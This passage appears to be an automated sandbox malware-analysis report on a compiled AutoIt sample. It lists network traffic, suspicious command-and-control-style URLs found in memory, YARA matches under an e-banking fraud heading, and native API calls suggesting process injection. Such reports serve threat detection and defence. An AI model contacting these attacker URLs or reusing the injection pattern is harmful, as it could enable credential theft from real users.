__cf_bm=kPF5WOIbv289WV_8Iv3X8SkQUHdrTl1cyi.LnhZ19NE-1736531568-1.0.1.1-wLlpJPI2CpHKNBGn5BQnfRjo_e0COCMx6BtjRy_5UCTxce2zSGIWMDIdXP3vj2Nef.CJBuhWdBE6r3OyGWawFg; path=/; expires=Fri, 10-Jan-25 18:22:48 GMT; domain=.www.santillo.bet; HttpOnlySet-Cookie: _cfuvid=tjDDRZqDWqo8a54c.rcLDL7Wr_6tCMYR8nvg3i_x0.Y-1736531568058-0.0.1.1-604800000; path=/; domain=.www.santillo.bet; HttpOnlyServer: cloudflareCF-RAY: 8ffe85dadf137c9f-EWRContent-Encoding: gzipData Raw: 37 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 e1 6e db 38 12 fe 6d 3f 05 c3 e2 ce 7f 4c c9 4e 36 9b d6 91 54 1c ba 5d 60 81 1e b6 40 36 c0 1e 92 c0 a0 a4 b1 c4 94 22 b5 24 65 27 17 e4 61 ee e7 3d c5 01 7d b2 05 49 c9 96 1c a7 4d b1 05 ce 81 61 71 c8 99 f9 66 38 1c 7e 4a 74 f4 d3 af ef 7e fb d7 c7 f7 a8 34 15 4f c6 91 fd 41 9c 8a 22 c6 20 c8 e5 05 b6 32 a0 79 32 1e 45 15 18 8a b2 92 2a 0d 26 c6 97 bf fd 4c 5e 63 14 da 19 c3 0c 87 44 53 61 18 e7 32 48 c1 44 a1 97 8d 5a 35 41 2b 88 f1 9a c1 a6 96 ca 60 94 49 61 40 98 18 6f 58 6e ca 38 87 35 cb 80 b8 c1 14 55 f4 8e 55 4d 45 74 46 39 c4 f3 29 62 82 19 46 f9 4e 50 31 d1 5f 81 b7 f0 bc 9f 1c 74 a6 58 6d 98 14 3d 57 38 dc 2e 2b 8d a9 09 fc d1 b0 75 8c 7f 27 97 ff 20 ef 64 55 Data Ascii: 719Xn8m?LN6T]`@6"$e'a=}IMaqf8~Jt~4OA" 2y2E*&L^cDSa2HDZ5A+`Ia@oXn85UUMEtF9)bFNP1_tXm=W8.+u' dU
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:52:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeLink: <https://santillo.bet/wp-json/>; rel="https://api.w.org/"Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Vary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2Referrer-Policy: no-referrer-when-downgradeX-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICSet-Cookie: __cf_bm=K9cchmZV9L18Uz6a40P9HjSoChJpH5MWTf4TC497znU-1736531570-1.0.1.1-O5SA7sTayuFHs7fbBoOpzkbVABEGnUx8QxtUnL4Hl..FnNys9qNxhNGtYwy2y1ryE4u9XGocNs00nJVxtB2hSg; path=/; expires=Fri, 10-Jan-25 18:22:50 GMT; domain=.www.santillo.bet; HttpOnlySet-Cookie: _cfuvid=C1.elr4RXk_GoQvjY3xrxDTseg2.UvfbIPX.0JDABbc-1736531570654-0.0.1.1-604800000; path=/; domain=.www.santillo.bet; HttpOnlyServer: cloudflareCF-RAY: 8ffe85eb683f18b8-EWRContent-Encoding: gzipData Raw: 37 32 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 e1 6e db 38 12 fe 6d 3f 05 c3 e2 ce 7f 4c c9 4e 36 9b d6 91 54 1c ba 5d 60 81 1e b6 40 36 c0 1e 92 c0 a0 a4 b1 c4 94 22 b5 24 65 27 17 e4 61 ee e7 3d c5 01 7d b2 05 49 c9 96 1c a7 4d b1 05 ce 81 61 71 c8 99 f9 66 38 1c 7e 4a 74 f4 d3 af ef 7e fb d7 c7 f7 a8 34 15 4f c6 91 fd 41 9c 8a 22 c6 20 c8 e5 05 b6 32 a0 79 32 1e 45 15 18 8a b2 92 2a 0d 26 c6 97 bf fd 4c 5e 63 14 da 19 c3 0c 87 44 53 61 18 e7 32 48 c1 44 a1 97 8d 5a 35 41 2b 88 f1 9a c1 a6 96 ca 60 94 49 61 40 98 18 6f 58 6e ca 38 87 35 cb 80 b8 c1 14 55 f4 8e 55 4d 45 74 46 39 c4 f3 29 62 82 19 46 f9 4e 50 31 d1 5f 81 b7 f0 bc 9f 1c 74 a6 58 6d 98 14 3d 57 38 dc 2e 2b 8d a9 09 fc d1 b0 75 8c 7f 27 97 ff 20 ef 64 55 Data Ascii: 724Xn8m?LN6T]`@6"$e'a=}IMaqf8~Jt~4OA" 2y2E*&L^cDSa2HDZ5A+`Ia@oXn85UUMEtF9)bFNP1_tXm=W8.+u' dU
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:52:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeLink: <https://santillo.bet/wp-json/>; rel="https://api.w.org/"Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Vary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2Referrer-Policy: no-referrer-when-downgradeX-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICSet-Cookie: __cf_bm=xk_ltVpSlwlZZ42q52B_m0jLl79P5naSHaqtn3N3vZ0-1736531573-1.0.1.1-Ucb5Xtle.3ZPXmsaP5eeiH6A.49KjLMSuYFFFLdGwRSPT85BDN5_UctJvqWS7yQtPY96f2ZXUU41UZd.mxCADg; path=/; expires=Fri, 10-Jan-25 18:22:53 GMT; domain=.www.santillo.bet; HttpOnlySet-Cookie: _cfuvid=Vp8sHZlvK9FHbdMB1Zxd3QFVCFX0UcpB949mCxG3hOQ-1736531573139-0.0.1.1-604800000; path=/; domain=.www.santillo.bet; HttpOnlyServer: cloudflareCF-RAY: 8ffe85fb1a98efa1-EWRContent-Encoding: gzipData Raw: 37 32 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 e1 6e db 38 12 fe 6d 3f 05 c3 e2 ce 7f 4c c9 4e 36 9b d6 91 54 1c ba 5d 60 81 1e b6 40 36 c0 1e 92 c0 a0 a4 b1 c4 94 22 b5 24 65 27 17 e4 61 ee e7 3d c5 01 7d b2 05 49 c9 96 1c a7 4d b1 05 ce 81 61 71 c8 99 f9 66 38 1c 7e 4a 74 f4 d3 af ef 7e fb d7 c7 f7 a8 34 15 4f c6 91 fd 41 9c 8a 22 c6 20 c8 e5 05 b6 32 a0 79 32 1e 45 15 18 8a b2 92 2a 0d 26 c6 97 bf fd 4c 5e 63 14 da 19 c3 0c 87 44 53 61 18 e7 32 48 c1 44 a1 97 8d 5a 35 41 2b 88 f1 9a c1 a6 96 ca 60 94 49 61 40 98 18 6f 58 6e ca 38 87 35 cb 80 b8 c1 14 55 f4 8e 55 4d 45 74 46 39 c4 f3 29 62 82 19 46 f9 4e 50 31 d1 5f 81 b7 f0 bc 9f 1c 74 a6 58 6d 98 14 3d 57 38 dc 2e 2b 8d a9 09 fc d1 b0 75 8c 7f 27 97 ff 20 ef 64 55 Data Ascii: 724Xn8m?LN6T]`@6"$e'a=}IMaqf8~Jt~4OA" 2y2E*&L^cDSa2HDZ5A+`Ia@oXn85UUMEtF9)bFNP1_tXm=W8.+u' dU
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 10 Jan 2025 17:53:09 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2025-01-10T17:53:14.5483463Z
                Source: wiaacmgr.exe, 00000006.00000002.3561555104.0000000005216000.00000004.10000000.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000002.3561058213.00000000037B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://pku-cs-cjw.top/k3hn/?3h=dZddn2QnmIt3Z4ttbkFYhAUU7sI66h1hr8Xg5sy2kai1E7eSB/izKfIU3bxH1QSpc7GJ9
                Source: wiaacmgr.exe, 00000006.00000002.3561555104.0000000005B82000.00000004.10000000.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000002.3561058213.0000000004122000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://santillo.bet/v9ah/?3h=yC3bXnyDZ4yqdl1qCLuqI8XvPsLlvIGaS84o6k5LK0tOudOrulJf3tgJD9KHnC2w/BXUgGD
                Source: wiaacmgr.exe, 00000006.00000002.3561555104.00000000053A8000.00000004.10000000.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000002.3561058213.0000000003948000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.ausyva4.top/al74/?Ol=yN0LtN-HDTPXX&amp;3h=1Bjse4aauCmo97N4UzKD0aR8m36fCMVAUwTJU6u6E
                Source: wdFhguqpcrad.exe, 00000007.00000002.3562519026.00000000056D4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.shipley.group
                Source: wdFhguqpcrad.exe, 00000007.00000002.3562519026.00000000056D4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.shipley.group/5g1j/
                Source: wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: wiaacmgr.exe, 00000006.00000002.3560220883.00000000009AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: wiaacmgr.exe, 00000006.00000002.3560220883.00000000009AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: wiaacmgr.exe, 00000006.00000002.3560220883.00000000009AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: wiaacmgr.exe, 00000006.00000002.3560220883.00000000009AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033Y
                Source: wiaacmgr.exe, 00000006.00000002.3560220883.00000000009AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: wiaacmgr.exe, 00000006.00000002.3560220883.00000000009AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: wiaacmgr.exe, 00000006.00000003.2135441725.00000000078C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: wiaacmgr.exe, 00000006.00000002.3561555104.00000000059F0000.00000004.10000000.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000002.3561058213.0000000003F90000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wanwang.aliyun.com/nametrade/domainshow?domain=
Source: wiaacmgr.exe, 00000006.00000002.3563181332.00000000078EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: wiaacmgr.exe, 00000006.00000002.3561555104.000000000553A000.00000004.10000000.00040000.00000000.sdmp, wiaacmgr.exe, 00000006.00000002.3563035654.0000000007590000.00000004.00000800.00020000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000002.3561058213.0000000003ADA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: wiaacmgr.exe, 00000006.00000002.3561555104.00000000056CC000.00000004.10000000.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000002.3561058213.0000000003C6C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.juewucangku.xyz/b6bc/?3h=xoBYbUYuit1npWAzc9zxgzbhPQqmOl0jRZPyJ7i/hpkEutNt4jOTaw6JRAgW2lC
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_0095EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_0095ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_0095EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_0094AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput
Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_00979576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                E-Banking Fraud

Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3561027868.0000000004410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3561060314.0000000004460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3560023676.0000000000680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1962969685.00000000031C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1962529025.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3560926994.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1963457204.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

Source: 3HnH4uJtE7.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 3HnH4uJtE7.exe, 00000000.00000000.1706967477.00000000009A2000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script.memstr_e0d5cc60-7
Source: 3HnH4uJtE7.exe, 00000000.00000000.1706967477.00000000009A2000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_3ac6b912-9
Source: 3HnH4uJtE7.exe String found in binary or memory: This is a third-party compiled AutoIt script.memstr_f6ed0791-4
Source: 3HnH4uJtE7.exe String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_fb892a7b-3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0042CB43 NtClose
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040AA5A NtMapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033735C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03374340 NtSetContextThread
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03374650 NtSuspendThread
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372BA0 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372BF0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372BE0 NtQueryValueKey
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372AF0 NtWriteFile
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372AD0 NtReadFile
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372F30 NtCreateSection
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372FB0 NtResumeThread
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372FA0 NtQuerySection
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372FE0 NtCreateFile
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372E80 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372EE0 NtQueueApcThread
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372D30 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372D10 NtMapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372DD0 NtDelayExecution
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372C70 NtFreeVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372C60 NtCreateKey
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372CA0 NtQueryInformationToken
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03372CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03373010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03373090 NtSetValueKey
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_033739B0 NtGetContextThread
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03373D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03373D70 NtOpenThread
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E4650 NtSuspendThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E4340 NtSetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2C60 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2CA0 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2D30 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2D10 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2DD0 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2EE0 NtQueueApcThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2E80 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2F30 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2FE0 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2FB0 NtResumeThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2AF0 NtWriteFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2AD0 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2BE0 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2BA0 NtEnumerateValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E35C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E39B0 NtGetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2FA0 NtQuerySection
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E2B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E3010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E3090 NtSetValueKey
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E3D70 NtOpenThread
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_046E3D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_006A95B0 NtCreateFile
Source: C:\Windows\SysWOW64\wiaacmgr.exe Code function: 6_2_006A9720 NtReadFile
